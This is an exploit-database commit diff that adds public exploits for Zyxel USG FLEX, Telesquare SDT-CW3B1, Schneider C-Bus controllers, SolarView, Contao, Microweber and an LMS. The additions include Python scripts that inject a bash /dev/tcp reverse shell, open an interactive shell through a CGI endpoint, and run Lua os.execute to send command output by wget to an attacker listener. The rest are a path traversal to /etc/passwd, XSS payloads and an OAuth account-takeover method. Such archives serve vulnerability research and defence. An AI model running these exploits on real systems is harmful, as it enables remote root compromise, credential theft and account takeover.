DB: 2022-06-04

7 changes to exploits/shellcodes

Zyxel USG FLEX 5.21 - OS Command Injection
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
SolarView Compact 6.00 - Directory Traversal
Contao 4.13.2 - Cross-Site Scripting (XSS)
Microweber CMS 1.2.15 - Account Takeover

exploits/hardware/remote/50946.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
+# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
+# Date: May 18th 2022
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://www.zyxel.com
+# Version: ZLD5.00 thru ZLD5.21
+# Tested on: Linux
+# CVE: CVE-2022-30525
+
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import sys
+import json
+import base64
+import requests
+import argparse
+
+
+parser = argparse.ArgumentParser(
+    prog="CVE-2022-30525.py",
+    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
+)
+parser.add_argument("-u", dest="url", help="Specify target URL")
+parser.add_argument("-r", dest="host", help="Specify Remote host")
+parser.add_argument("-p", dest="port", help="Specify Remote port")
+
+args = parser.parse_args()
+
+banner = (
+    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
+    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
+    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
+    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
+    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
+    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
+    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
+    "biA6KSApCg=="
+)
+
+
+def main():
+
+    print("\n" + base64.b64decode(banner).decode("utf-8"))
+
+    if None in vars(args).values():
+        print(f"[!] Please enter all parameters !")
+        parser.print_help()
+        sys.exit()
+
+    if "http" not in args.url:
+        args.url = "https://" + args.url
+    args.url += "/ztp/cgi-bin/handler"
+    exploit(args.url, args.host, args.port)
+
+
+def exploit(url, host, port):
+    headers = {
+        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
+        "Content-Type": "application/json",
+    }
+
+    data = {
+        "command": "setWanPortSt",
+        "proto": "dhcp",
+        "port": "4",
+        "vlan_tagged": "1",
+        "vlanid": "5",
+        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
+        "data": "hi",
+    }
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
+
+    try:
+        response = requests.post(
+            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
+        )
+    except (KeyboardInterrupt, requests.exceptions.Timeout):
+        print("[!] Bye Bye hekcer !")
+        sys.exit(1)
+    finally:
+
+        try:
+            print("[!] Can't exploit the target ! Code :", response.status_code)
+
+        except:
+            print("[!] Enjoy your shell !!!")
+
+
+if __name__ == "__main__":
+    main()

exploits/hardware/remote/50948.py

@@ -0,0 +1,97 @@
+#!/usr/bin/python3
+
+# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
+# Date: 24th May 2022
+# Exploit Author: Bryan Leong <NobodyAtall>
+# Vendor Homepage: http://telesquare.co.kr/
+# CVE : CVE-2021-46422
+# Authentication Required: No
+
+import requests
+import argparse
+import sys
+from xml.etree import ElementTree
+
+def sysArgument():
+	ap = argparse.ArgumentParser()
+	ap.add_argument("--host", required=True, help="target hostname/IP")
+	args = vars(ap.parse_args())
+	return args['host']
+
+def checkHost(host):
+	url = "http://" + host
+
+	print("[*] Checking host is it alive?")
+
+	try:
+		rsl = requests.get(url)
+		print("[*] The host is alive.")
+	except requests.exceptions.Timeout as err:
+		raise SystemExit(err)
+
+def exploit(host):
+	url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
+
+	#checking does the CGI exists?
+	rsl = requests.get(url)
+
+	if(rsl.status_code == 200):
+		print("[*] CGI script exist!")
+		print("[*] Injecting some shell command.")
+
+		#1st test injecting id command
+		cmd = "id"
+
+		try:
+			rsl = requests.get(url + cmd, stream=True)
+			xmlparser = ElementTree.iterparse(rsl.raw)
+
+			cmdRet = []
+
+			for event, elem in xmlparser:
+				if(elem.tag == 'CmdResult'):
+					cmdRet.append(elem.text)
+		except:
+			print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
+			sys.exit(0)
+
+		if(len(cmdRet) != 0):
+			print("[*] There's response from the CGI script!")
+			print('[*] System ID: ' + cmdRet[0].strip())
+
+			print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
+			#start shell iteration
+			while(True):
+				cmdInput = input("[SDT-CW3B1 Shell]# ")
+
+				if(cmdInput == ".exit"):
+					print("[*] Exiting shell.")
+					sys.exit(0)
+
+				rsl = requests.get(url + cmdInput, stream=True)
+				xmlparser = ElementTree.iterparse(rsl.raw)
+
+
+				for event, elem in xmlparser:
+					if(elem.tag == 'CmdResult'):
+						print(elem.text.strip())
+
+				print('\n')
+
+		else:
+			print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
+			sys.exit(0)
+
+	else:
+		print("[!] CGI script not found.")
+		print(rsl.status_code)
+		sys.exit(0)
+
+def main():
+	host = sysArgument()
+
+	checkHost(host)
+	exploit(host)
+
+if  __name__ == "__main__":
+	main()

exploits/hardware/remote/50949.py

@@ -0,0 +1,281 @@
+# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
+# Exploit Author: LiquidWorm
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
+#
+#
+# Vendor: Schneider Electric SE
+# Product web page: https://www.se.com | https://www.clipsal.com
+# Product details:
+# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
+# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
+# Affected version: CLIPSAL 5500SHAC (i.MX28)
+#                   CLIPSAL 5500NAC (i.MX28)
+#                   SW: 1.10.0, 1.6.0
+#                   HW: 1.0
+#                   Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
+#                   SpaceLogic C-Bus
+#
+# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
+# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from
+# Schneider Electric. It is specifically designed to unite the C-Bus home
+# automation solution with common household communication protocols, from
+# lighting and climate control, to security, entertainment and energy metering.
+# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
+# for residential homes or zones within a building and integrates functions
+# such as heating/cooling, energy/load monitoring and remote control for C-Bus
+# and Modbus.
+#
+# Desc: The automation controller suffers from an authenticated arbitrary
+# command execution vulnerability. An attacker can abuse the Start-up (init)
+# script editor and exploit the 'script' POST parameter to insert malicious
+# Lua script code and execute commands with root privileges that will grant
+# full control of the device.
+#
+# ------------------------------------------------------------------------------
+# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
+# ----------------------------------------------------------------------
+# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
+# [*] Starting exfiltration handler on port 8888
+# [*] Writing Lua initscript... done.
+# [*] Running os.execute()... done.
+# [*] Got request from 192.168.0.10:33522
+# [*] Printing target's request:
+#
+# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
+# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
+# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
+# close\r\n\r\n"
+#
+# [*] Cleaning up... done.
+#
+# $
+# ------------------------------------------------------------------------------
+#
+# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
+#            GNU/Linux 4.4.115 (armv5tejl)
+#            LuaJIT 2.0.5
+#            FlashSYS v2
+#            nginx
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2022-5707
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
+#
+#
+# 12.03.2022
+#
+
+import threading#!
+import datetime##!
+import requests##!
+import socket####!
+import time######!
+import sys#######!
+import re########!
+
+from requests.auth import HTTPBasicAuth
+from time import sleep as spikaj
+
+class Wiser:
+
+    def __init__(self):
+        self.headers = None
+        self.uri = '/scada-main/scripting/'
+        self.savs = self.uri + 'save'
+        self.runs = self.uri + 'run'
+        self.start = datetime.datetime.now()
+        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
+        self.creds = HTTPBasicAuth('admin', 'admin123')
+
+    def memo(self):
+        if len(sys.argv) != 5:
+            self.use()
+        else:
+            self.target = sys.argv[1]
+            self.execmd = sys.argv[2]
+            self.localh = sys.argv[3]
+            self.localp = int(sys.argv[4])
+            if not 'http' in self.target:
+                self.target = 'http://{}'.format(self.target)
+
+    def exfil(self):
+        print('[*] Starting exfiltration handler on port {}'.format(self.localp))
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind(('0.0.0.0', self.localp))
+        while True:
+            try:
+                s.settimeout(9)
+                s.listen(1)
+                conn, addr = s.accept()
+                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
+                data = conn.recv(2003)
+                print('[*] Printing target\'s request:')
+                print('\n%s' %data)
+            except socket.timeout as p:
+                print('[!] Something\'s not right. Check your port mappings!')
+            break
+        s.close()
+        self.clean()
+
+    def mtask(self):
+        konac = threading.Thread(name='thricer.exe', target=self.exfil)
+        konac.start()
+        self.byts()
+
+    def byts(self):
+        self.headers = {
+            'Referer':self.target+'/scada-main/main/editor?id=initscript',
+            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
+            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
+            'Content-Type':'text/plain;charset=UTF-8',
+            'User-Agent':'SweetHomeAlabama/2003.59',
+            'X-Requested-With':'XMLHttpRequest',
+            'Accept-Language':'en-US,en;q=0.9',
+            'Accept-Encoding':'gzip, deflate',
+            'Sec-Ch-Ua-Platform':'"Windows"',
+            'Sec-Fetch-Site':'same-origin',
+            'Connection':'keep-alive',
+            'Sec-Fetch-Dest':'empty',
+            'Sec-Ch-Ua-Mobile':'?0',
+            'Sec-Fetch-Mode':'cors',
+            'Origin':self.target,
+            'Accept':'*/*',
+            'sec-gpc':'1'
+            }
+
+        self.loada  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={
+        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C'                 # "ext-comp-1004":"",
+        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C'                 # "ext-comp-1005":"",
+        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C'                 # "ext-comp-1006":"",
+        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C'                 # "ext-comp-1007":"",
+        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C'                 # "ext-comp-1008":"",
+        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
+        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C'                     # "id":"initscript",
+        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C'                                     # "script":null,
+        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D'             # "scriptonly":"true"}
+        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65'                     # &script=os.execute
+        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60'                                             # ('wget -U "`
+        self.loada += self.execmd                                                                                    # [command input]
+        self.loada += '\x60\x22\x20'                                                                                 # `".
+        self.loada += self.localh+':'+str(self.localp)                                                               # [listener input]
+        self.loada += '\x27\x29'                                                                                     # ')
+        self.loadb  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={
+        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D'                     # "id":"initscript"}
+
+        print('[*] Writing Lua initscript... ', end='')
+        sys.stdout.flush()
+        spikaj(0.7)
+
+        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
+        if not 'success' in htreq.text:
+            print('didn\'t work!')
+            exit(17)
+        else:
+            print('done.')
+
+        print('[*] Running os.execute()... ', end='')
+        sys.stdout.flush()
+        spikaj(0.7)
+
+        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
+        if not 'success' in htreq.text:
+            print('didn\'t work!')
+            exit(19)
+        else:
+            print('done.')
+
+    def splash(self):
+        Baah_loon = '''
+     ######
+   ##########
+  ######    _\_
+  ##===----[.].]
+  #(     ,   _\\
+   #      )\__|
+    \        /
+     `-._``-'
+        >@
+         |
+         |
+         |
+         |
+         |  Schneider Electric C-Bus SmartHome Automation Controller
+         |        Root Remote Code Execution Proof of Concept
+         |                       ZSL-2022-5707
+         |
+         |
+         |
+        '''
+        print(Baah_loon)
+
+    def use(self):
+        self.splash()
+        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
+        exit(0)
+
+    def clean(self):
+        print('\n[*] Cleaning up... ', end='')
+        sys.stdout.flush()
+        spikaj(0.7)
+
+        self.headers = {'X-Requested-With':'XMLHttpRequest'}
+
+        self.blank  = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
+        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
+        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
+        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
+
+        self.dlank  = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
+        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
+        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
+        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
+
+        self.clank  = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
+        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
+        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
+        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
+
+        self.slank  = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
+        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
+        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
+        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
+
+        self.glank  = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
+        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
+        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
+        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
+
+        self.hlank  = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
+        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
+        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
+        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
+
+        self.flank  = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
+        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
+
+        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
+        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
+        if not 'success' in htreq.text:
+            print('didn\'t work!')
+            exit(18)
+        else:
+            print('done.')
+            exit(-1)
+
+    def main(self):
+        print('-'*70)
+        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
+        self.memo(), self.mtask()
+
+if __name__ == '__main__':
+    Wiser().main()

exploits/hardware/remote/50950.txt

@@ -0,0 +1,13 @@
+# Exploit Title: SolarView Compact 6.00 - Directory Traversal
+# Date: 2022-05-15
+# Exploit Author: Ahmed Alroky
+# Author Company : Aiactive
+# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
+# Version: ver.6.00
+# Vendor home page : https://www.contec.com/
+# Authentication Required: No
+# CVE : CVE-2022-29298
+
+# Tested on: Windows
+
+# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg

exploits/multiple/webapps/49298.txt

@@ -5,11 +5,11 @@
 # Tested on Win10 and Google Chrome
 # Exploit Author: Vinicius Alves
 
-# XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
+# XSS Payload: </script><svg onload=alert();>
 
 1) Access LMS and log in to admin panel
 2) Access courses page
 3) Open course manager and SEO menu
 4) Paste the XSS Payload tag and Submit
 5) Access the course page on frontend
-6) Exploited!
+6) Trigged!

exploits/php/webapps/50945.tzt

@@ -0,0 +1,18 @@
+# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 04/28/2022
+# Exploit Author: Chetanya Sharma @AggressiveUser
+# Vendor Homepage: https://contao.org/en/
+# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
+# Version: [ 4.13.2 ]
+# Tested on: [KALI OS]
+# CVE : CVE-2022-1588
+# References:
+- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
+- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
+- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
+---------------
+
+Steps to reproduce:
+Navigate to the below URL
+URL: https://localhost/contao/"><svg//onload=alert(112233)>

exploits/php/webapps/50947.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Microweber CMS 1.2.15 - Account Takeover
+# Date: 2022-05-09
+# Exploit Author: Manojkumar J
+# Vendor Homepage: https://github.com/microweber/microweber
+# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
+# Version: <=1.2.15
+# Tested on: Windows10
+# CVE : CVE-2022-1631
+
+# Description:
+
+Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth
+Misconfiguration Leads To Account Takeover.
+
+# Steps to exploit:
+
+1. Create an account with the victim's email address.
+
+Register endpoint: https://target-website.com/register#
+
+2. When the victim tries to login with default Oauth providers like Google,
+Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)
+with that same e-mail id that we created account before, via this way we
+can take over the victim's account with the recently created login
+credentials.

files_exploits.csv

@@ -18697,6 +18697,10 @@ id,file,description,date,author,type,platform,port
 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Minh Khoa",remote,hardware,
 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
+50946,exploits/hardware/remote/50946.txt,"Zyxel USG FLEX 5.21 - OS Command Injection",1970-01-01,"Valentin Lobstein",remote,hardware,
+50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware,
+50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware,
+50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45007,3 +45011,5 @@ id,file,description,date,author,type,platform,port
 50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php,
 50943,exploits/php/webapps/50943.py,"m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Malte V",webapps,php,
 50944,exploits/php/webapps/50944.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)",1970-01-01,RedHatAugust,webapps,php,
+50945,exploits/php/webapps/50945.tzt,"Contao 4.13.2 - Cross-Site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
+50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,